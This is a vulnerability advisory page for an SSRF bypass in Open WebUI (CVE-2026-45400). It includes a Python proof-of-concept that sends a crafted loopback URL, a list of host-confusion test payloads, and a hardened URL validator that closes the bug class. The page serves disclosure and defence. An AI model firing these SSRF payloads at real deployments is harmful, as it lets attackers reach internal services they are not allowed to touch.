Security Vulnerability Report
CVE-2026-45400 CVSS 8.5 HIGH


Published: 2026-05-15 21:16:38
Last Modified: 2026-05-15 22:16:56

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, a parsing difference between the urlparse and requests libraries led to an SSRF bypass vulnerability. This vulnerability is fixed in 0.9.5.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

Configurations (Affected Products)

Open WebUI < 0.9.5 (affected range taken from the description; no CPE configuration data has been published yet, and the record's vulnStatus is still "Received").

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
PoC for CVE-2026-45400 (Open WebUI SSRF bypass).

Simulates the two halves of the bug: a validator that inspects the URL with
urllib.parse.urlparse, and a fetcher that hands the same string to requests.
The advisory's exact bypass string is not reproduced on this page; the
payload below is the page's original illustration of the idea.
"""
import requests
from urllib.parse import urlparse

# The page's example payload: a fragment that contains "@attacker.com".
# For this string urlparse puts "127.0.0.1:80" in netloc and "@attacker.com"
# in fragment, so the allow-list check below does NOT pass as written; the
# script still shows that requests strips the fragment and connects to the
# loopback host. A working bypass needs a string that urlparse and requests
# split differently (see the GHSA advisory under References).
malicious_url = "http://127.0.0.1:80#@attacker.com"
ALLOWED_HOST = "attacker.com"   # stand-in for the application's allow-list


def validator_view(url: str) -> bool:
    """Simulation 1: how the vulnerable app validates (urlparse on netloc)."""
    parsed = urlparse(url)
    print(f"[+] urlparse sees netloc (host): {parsed.netloc!r}, fragment: {parsed.fragment!r}")
    allowed = ALLOWED_HOST in parsed.netloc
    print(f"[+] App validation check: is {ALLOWED_HOST!r} in netloc? -> {allowed}")
    return allowed


def fetcher_view(url: str) -> None:
    """Simulation 2: how the app sends the request (requests drops the fragment)."""
    print("\n[+] Sending request using requests library...")
    try:
        response = requests.get(url, timeout=5)
        print(f"[+] Request actually went to: {response.url}")
        print(f"[+] Response status code: {response.status_code}")
        if response.status_code == 200:
            print("[!] SSRF successful: internal service accessed.")
        else:
            print("[-] Service returned a non-200 status.")
    except requests.exceptions.ConnectionError:
        print("[-] Connection failed (target offline or nothing listening on 127.0.0.1:80)")
    except requests.exceptions.RequestException as exc:
        print(f"[-] Error: {exc}")


if __name__ == "__main__":
    print(f"[+] Testing URL: {malicious_url}")
    if validator_view(malicious_url):
        print("[!] Validation PASSED (app thinks it is safe)")
    else:
        print("[-] Validation FAILED for this payload; fetch shown for comparison only")
    fetcher_view(malicious_url)
```
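The bug class behind this CVE is a validator and an HTTP client that parse the same string differently. The defensive pattern is to refuse the URL features parsers disagree on (fragments, userinfo, odd host spellings), classify every address the host resolves to, and then rebuild the URL the client fetches from the validated components only. The following is an added example of that pattern, written for this page; it is not Open WebUI's code and not the project's fix. It goes beyond the page's single payload and also covers userinfo confusion, IPv4-mapped IPv6 loopback, decimal/hex host spellings and DNS names with a mix of public and private answers. The function names, the `FAKE_DNS` table and the use of 93.184.216.34 as a stand-in public address are assumptions made for the demo.

```python
#!/usr/bin/env python3
"""
Hardened outbound-URL check for an SSRF sink (added example, not Open WebUI code).

Closes the parser-mismatch class behind CVE-2026-45400 by (1) rejecting URL
features that different parsers split differently, (2) classifying every
address the host resolves to, and (3) rebuilding the URL the fetcher will use
from the validated components only, so validator and client see one parse.
"""
from __future__ import annotations

import ipaddress
import re
import socket
from typing import Callable, Iterable
from urllib.parse import urlparse, urlunparse

ALLOWED_SCHEMES = {"http", "https"}
# RFC 1123 label syntax; anything else (backslashes, spaces, brackets) is refused.
HOSTNAME_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\.?$")
# Decimal/octal/hex forms (2130706433, 0177.0.0.1, 0x7f000001) that a libc
# resolver may turn into 127.0.0.1 even though the ipaddress module rejects them.
NUMERIC_HOST_RE = re.compile(r"^(?:[0-9.]+|0[xX][0-9A-Fa-f.]+)$")


class UnsafeURL(ValueError):
    """Raised when a URL must not be fetched server-side."""


def system_resolve(host: str) -> list[str]:
    """Default resolver: all A/AAAA answers from the OS resolver (needs DNS)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def _normalize_ip(addr: str):
    """Parse an address string; unwrap IPv4-mapped IPv6 (::ffff:127.0.0.1)."""
    ip = ipaddress.ip_address(addr)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return ip


def _is_public(ip) -> bool:
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def safe_outbound_url(url: str, resolve: Callable[[str], Iterable[str]] = system_resolve) -> str:
    """Validate `url` and return the canonical URL the HTTP client should fetch."""
    if "#" in url:                      # a fragment is meaningless to a server-side fetch
        raise UnsafeURL("fragment not allowed")
    p = urlparse(url)
    if p.scheme.lower() not in ALLOWED_SCHEMES:
        raise UnsafeURL(f"scheme not allowed: {p.scheme!r}")
    if "@" in p.netloc:                 # userinfo is the classic host-confusion vector
        raise UnsafeURL("userinfo not allowed")
    host = p.hostname                   # lower-cased, brackets stripped for IPv6
    if not host:
        raise UnsafeURL("missing host")
    try:
        port = p.port                   # ValueError on a non-numeric port
    except ValueError as exc:
        raise UnsafeURL(f"bad port: {exc}") from None
    try:
        ips = [_normalize_ip(host)]     # IP literal: classify directly
    except ValueError:
        if NUMERIC_HOST_RE.match(host) or not HOSTNAME_RE.match(host):
            raise UnsafeURL(f"malformed hostname: {host!r}") from None
        ips = [_normalize_ip(a) for a in resolve(host)]
        if not ips:
            raise UnsafeURL(f"unresolvable host: {host!r}")
    for ip in ips:                      # every answer must be public (mixed-answer DNS)
        if not _is_public(ip):
            raise UnsafeURL(f"{host!r} points at non-public address {ip}")
    netloc = f"[{host}]" if ":" in host else host
    if port:
        netloc += f":{port}"
    # Rebuild from validated parts; the fetcher gets exactly what was checked.
    return urlunparse((p.scheme.lower(), netloc, p.path or "/", p.params, p.query, ""))


def check(url: str, resolve: Callable[[str], Iterable[str]] = system_resolve) -> tuple[bool, str]:
    """Convenience wrapper: (True, canonical_url) or (False, reason)."""
    try:
        return True, safe_outbound_url(url, resolve)
    except UnsafeURL as exc:
        return False, str(exc)


# Constructed DNS table so the demo runs offline (hypothetical names).
FAKE_DNS = {
    "api.example.com": ["93.184.216.34"],
    "internal.corp": ["10.1.2.3"],
    "dual.example.com": ["93.184.216.34", "127.0.0.1"],  # one public, one loopback answer
}


def fake_resolve(host: str) -> list[str]:
    return FAKE_DNS.get(host, [])


if __name__ == "__main__":
    for candidate in (
        "http://127.0.0.1:80#@attacker.com",   # the page's payload
        "http://attacker.com@127.0.0.1/",      # userinfo confusion
        "http://[::ffff:127.0.0.1]/",          # mapped loopback
        "http://0x7f000001/",                  # hex loopback
        "http://dual.example.com/",
        "https://API.example.com:8443/v1?q=1",
    ):
        print(f"{candidate:45} -> {check(candidate, fake_resolve)}")
```

Pass the string returned by `safe_outbound_url` to the client, not the user's original, and fetch with `allow_redirects=False`, re-running the check on every `Location` header, since a validated public host can still 302 to an internal one. Two gaps remain by design: the client resolves the name a second time, so a DNS answer that changes between the two lookups (rebinding) is only closed by pinning the connection to the validated IP, and the resolver in use must be the same one the client will consult.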

References

https://github.com/open-webui/open-webui/security/advisories/GHSA-8w7q-q5jp-jvgx (GitHub Security Advisory; the only reference listed in the record, cited by both sources)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45400", "sourceIdentifier": "[email protected]", "published": "2026-05-15T21:16:38.003", "lastModified": "2026-05-15T22:16:55.820", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, a parsing difference between the urlparse and requests libraries led to an SSRF bypass vulnerability. This vulnerability is fixed in 0.9.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-8w7q-q5jp-jvgx", "source": "[email protected]"}, {"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-8w7q-q5jp-jvgx", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}